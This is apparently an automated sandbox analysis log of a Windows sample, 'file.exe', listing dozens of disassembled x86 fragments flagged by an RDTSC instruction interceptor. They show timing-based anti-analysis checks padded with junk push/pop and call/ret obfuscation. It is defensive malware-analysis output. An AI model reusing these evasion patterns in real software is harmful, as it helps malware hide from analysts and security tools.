Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C81EAB second address: C81EB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C81F55 second address: C81F62 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C81F62 second address: C81F6C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB97CFF0156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C81F6C second address: C81FA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE921Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D26CDh], edi 0x00000010 or esi, 22926E38h 0x00000016 push 00000000h 0x00000018 push 360EFE41h 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FB97CFE9226h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C81FA7 second address: C81FAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C81FAB second address: C82030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d xor dword ptr [esp], 360EFEC1h 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007FB97CFE9218h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e jnp 00007FB97CFE922Dh 0x00000034 mov dh, bl 0x00000036 push 00000003h 0x00000038 mov ecx, dword ptr [ebp+122D2A02h] 0x0000003e push 00000000h 0x00000040 clc 0x00000041 mov ch, EDh 0x00000043 push 00000003h 0x00000045 jno 00007FB97CFE921Ch 0x0000004b call 00007FB97CFE9219h 0x00000050 push eax 0x00000051 push edx 0x00000052 jc 00007FB97CFE921Ch 0x00000058 je 00007FB97CFE9216h 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C82030 second address: C82051 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FB97CFF0156h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 jmp 00007FB97CFF015Eh 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C82051 second address: C82057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C82057 second address: C8205B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8205B second address: C82077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push ecx 0x0000000d jnc 00007FB97CFE9218h 0x00000013 pop ecx 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C82077 second address: C8207F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C822A9 second address: C822CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE9225h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FB97CFE9216h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C822CE second address: C822D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C822D2 second address: C822D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C822D8 second address: C822DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA3624 second address: CA362A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA362A second address: CA3630 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA12E1 second address: CA12F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FB97CFE9216h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA12F0 second address: CA12F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1656 second address: CA166F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE9222h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA17CC second address: CA17D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA17D2 second address: CA17DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB97CFE9216h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA17DD second address: CA17E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA17E3 second address: CA17E9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1AA8 second address: CA1AB5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB97CFF0156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1AB5 second address: CA1ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1C26 second address: CA1C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1C2C second address: CA1C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FB97CFE921Fh 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1C46 second address: CA1C59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF015Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1DFF second address: CA1E03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1E03 second address: CA1E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1E09 second address: CA1E1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB97CFE921Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1E1C second address: CA1E4C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB97CFF0166h 0x0000000c jmp 00007FB97CFF0161h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1F91 second address: CA1FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFE9223h 0x00000009 jo 00007FB97CFE9216h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1FB4 second address: CA1FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FB97CFF0163h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA22B6 second address: CA22BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA22BC second address: CA22D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF0164h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA22D4 second address: CA22DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA22DA second address: CA22E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB97CFF0156h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C98473 second address: C98478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA2750 second address: CA2754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA2754 second address: CA275F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA2E79 second address: CA2E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB97CFF0156h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA2E84 second address: CA2EAC instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB97CFE9218h 0x00000008 push esi 0x00000009 pop esi 0x0000000a jg 00007FB97CFE9232h 0x00000010 jmp 00007FB97CFE9226h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA300D second address: CA3016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA3016 second address: CA3020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB97CFE9216h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA3191 second address: CA3195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA3195 second address: CA31D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB97CFE9221h 0x0000000b pushad 0x0000000c jo 00007FB97CFE9216h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jo 00007FB97CFE9216h 0x0000001a popad 0x0000001b jmp 00007FB97CFE9223h 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA347A second address: CA3485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA3485 second address: CA34A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE9229h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA808F second address: CA80AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF0167h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA80AA second address: CA80B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA80B0 second address: CA80BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAE31C second address: CAE320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB0549 second address: CB054F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB054F second address: CB0553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB3302 second address: CB3306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB3442 second address: CB347E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007FB97CFE9224h 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e jbe 00007FB97CFE9222h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 je 00007FB97CFE921Ah 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB347E second address: CB3486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB3486 second address: CB348A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB38F4 second address: CB38F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB38F8 second address: CB38FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB466E second address: CB4673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB505E second address: CB5063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB5108 second address: CB510D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB5403 second address: CB5408 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB562F second address: CB563A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FB97CFF0156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB563A second address: CB5660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+122D2721h], ebx 0x00000010 mov di, A196h 0x00000014 xchg eax, ebx 0x00000015 pushad 0x00000016 jmp 00007FB97CFE921Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB5660 second address: CB567A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB97CFF0156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jmp 00007FB97CFF015Ah 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB567A second address: CB5680 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB5680 second address: CB5684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB5B3E second address: CB5B50 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jne 00007FB97CFE9216h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB5B50 second address: CB5BD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF015Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FB97CFF0158h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 mov esi, dword ptr [ebp+122D2AB6h] 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007FB97CFF0158h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 0000001Bh 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 mov edi, dword ptr [ebp+122D26DBh] 0x0000004d or dword ptr [ebp+122D24AFh], eax 0x00000053 push 00000000h 0x00000055 sub dword ptr [ebp+122D2684h], edx 0x0000005b push eax 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FB97CFF015Dh 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB5BD5 second address: CB5BD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB650C second address: CB6517 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB6517 second address: CB651D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB7B31 second address: CB7B3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB7B3B second address: CB7B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB7B3F second address: CB7B74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF0163h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB97CFF0169h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB9260 second address: CB9264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB9264 second address: CB9268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB8FA6 second address: CB8FAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB9268 second address: CB92A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a add dword ptr [ebp+122D272Fh], esi 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007FB97CFF0158h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D2E22h], edi 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB8FAA second address: CB8FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB92A9 second address: CB92AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB92AD second address: CB92B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB9998 second address: CB99BC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FB97CFF0163h 0x0000000f jng 00007FB97CFF0156h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBA698 second address: CBA69E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBDAE1 second address: CBDB06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FB97CFF0156h 0x0000000a jmp 00007FB97CFF015Bh 0x0000000f jmp 00007FB97CFF015Fh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC0B8E second address: CC0B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC0B92 second address: CC0BA4 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB97CFF0156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC0BA4 second address: CC0BAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC0BAA second address: CC0BAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
